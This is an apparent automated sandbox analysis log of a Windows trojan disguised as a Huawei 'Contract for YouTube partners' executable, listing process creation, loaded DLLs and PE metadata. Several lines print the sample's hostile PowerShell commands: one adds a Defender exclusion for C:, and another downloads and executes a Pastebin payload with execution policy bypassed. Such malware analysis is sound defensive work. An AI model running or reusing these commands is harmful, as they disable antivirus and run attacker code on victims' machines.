Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245657663.00000277512F0000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Diagnostics.Process.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248658900.000002B7E90C1000.00000020.00001000.00020000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Collections.Concurrent.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253056950.000002B7EB090000.00000004.10000000.00040000.00000000.sdmp | Binary or memory string: OriginalFilenameSystem.Windows.Forms.Primitives.dll@ vs [Huawei] Contract for YouTube partners.exe
Source: classification engineClassification label: mal100.troj.expl.evad.winEXE@14/18@4/5
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeFile created: C:\Users\user\AppData\Roaming\notification_sent.flagJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1424:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6184:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5660:120:WilError_03
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeFile created: C:\Users\user\AppData\Local\Temp\2025-02-17-13-35-39-screenshot.pngJump to behavior
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: [Huawei] Contract for YouTube partners.exeReversingLabs: Detection: 24%
Source: [Huawei] Contract for YouTube partners.exeVirustotal: Detection: 11%
Source: unknownProcess created: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe "C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe"
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD333.tmp" "c:\Users\user\AppData\Local\Temp\jwryu2yd\CSC4A1A778723A0488D9C81AB4CE7B7E2B.TMP"
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -ExecutionPolicy Bypass -Command "iex (iwr "https://pastebin.com/raw/WHKzW2nr" -UseBasicParsing).Content"
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\jwryu2yd\jwryu2yd.cmdline"
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESD333.tmp" "c:\Users\user\AppData\Local\Temp\jwryu2yd\CSC4A1A778723A0488D9C81AB4CE7B7E2B.TMP"
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: wldp.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: secur32.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: icu.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: wshunix.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: winrnr.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: nlaapi.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: wshbth.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: devobj.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: napinsp.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: pnrpnsp.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: wbemcomn.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: amsi.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: userenv.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: profapi.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: windowscodecs.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: schannel.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\[Huawei] Contract for YouTube partners.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iphlpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dnsapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc6.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dhcpcsvc.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winnsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasapi32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasman.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rtutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mswsock.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: winhttp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ondemandconnroutehelper.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rasadhlp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: fwpuclnt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: schannel.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mskeyprotect.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncrypt.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ncryptsslp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ntmarta.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: version.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: mscoree.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptsp.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: rsaenh.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: cryptbase.dll
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: mi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: miutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wmidcom.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: dpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Section loaded: wbemcomn.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
Source: [Huawei] Contract for YouTube partners.exe Static PE information: Virtual size of .text is bigger than: 0x100000
Source: [Huawei] Contract for YouTube partners.exe Static PE information: Image base 0x140000000 > 0x60000000
Source: [Huawei] Contract for YouTube partners.exe Static file information: File size 72795027 > 1048576
Source: [Huawei] Contract for YouTube partners.exe Static PE information: Raw size of .text is bigger than: 0x100000 < 0x61a800
Source: [Huawei] Contract for YouTube partners.exe Static PE information: Raw size of .rdata is bigger than: 0x100000 < 0x17c600
Source: [Huawei] Contract for YouTube partners.exe Static PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x157c00
Source: [Huawei] Contract for YouTube partners.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
Source: [Huawei] Contract for YouTube partners.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
Source: [Huawei] Contract for YouTube partners.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
Source: [Huawei] Contract for YouTube partners.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: [Huawei] Contract for YouTube partners.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
Source: [Huawei] Contract for YouTube partners.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Source: [Huawei] Contract for YouTube partners.exe Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Source: [Huawei] Contract for YouTube partners.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Threading.Thread\Release\net8.0\System.Threading.Thread.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250591766.000002B7E9D51000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250619026.000002B7E9D60000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Net.Sockets.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248897242.000002B7E9280000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248955580.000002B7E92C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Private.Xml\Release\net8.0-windows\System.Private.Xml.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249795196.000002B7E9680000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250073254.000002B7E9981000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Windows.Forms.Primitives.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253245076.000002B7EB261000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3253056950.000002B7EB090000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.IO.FileSystem.DriveInfo.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245966712.00000277513E1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3246764040.000002B7E5F40000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: /_/artifacts/obj/System.Drawing.Common/Release/net8.0/System.Drawing.Common.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251017895.000002B7E9F11000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3250944802.000002B7E9E90000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: Microsoft.Win32.Registry.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3244830292.000002774F971000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249770533.000002B7E9660000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Security.Cryptography\Release\net8.0-windows\System.Security.Cryptography.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248833493.000002B7E91C1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248750883.000002B7E9100000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Security\Release\net8.0-windows\System.Net.Security.pdbSHA256H source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248518064.000002B7E9000000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248575013.000002B7E9051000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: System.Net.Security.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248518064.000002B7E9000000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248575013.000002B7E9051000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.Quic\Release\net8.0-windows\System.Net.Quic.pdbSHA256 source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251604593.000002B7EA231000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251630855.000002B7EA250000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: System.Security.Principal.Windows.ni.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245786403.0000027751380000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3245744128.0000027751351000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.NonGeneric\Release\net8.0\System.Collections.NonGeneric.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251410435.000002B7EA1B1000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3251433635.000002B7EA1C0000.00000004.10000000.00040000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Collections.Concurrent\Release\net8.0\System.Collections.Concurrent.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248611872.000002B7E90A0000.00000004.10000000.00040000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3248658900.000002B7E90C1000.00000020.00001000.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\artifacts\obj\System.Net.NameResolution\Release\net8.0-windows\System.Net.NameResolution.pdb source: [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249010025.000002B7E9301000.00000020.00001000.00020000.00000000.sdmp, [Huawei] Contract for YouTube partners.exe, 00000000.00000002.3249032962.000002B7E9310000.00000004.10000000.00040000.00000000.sdmp
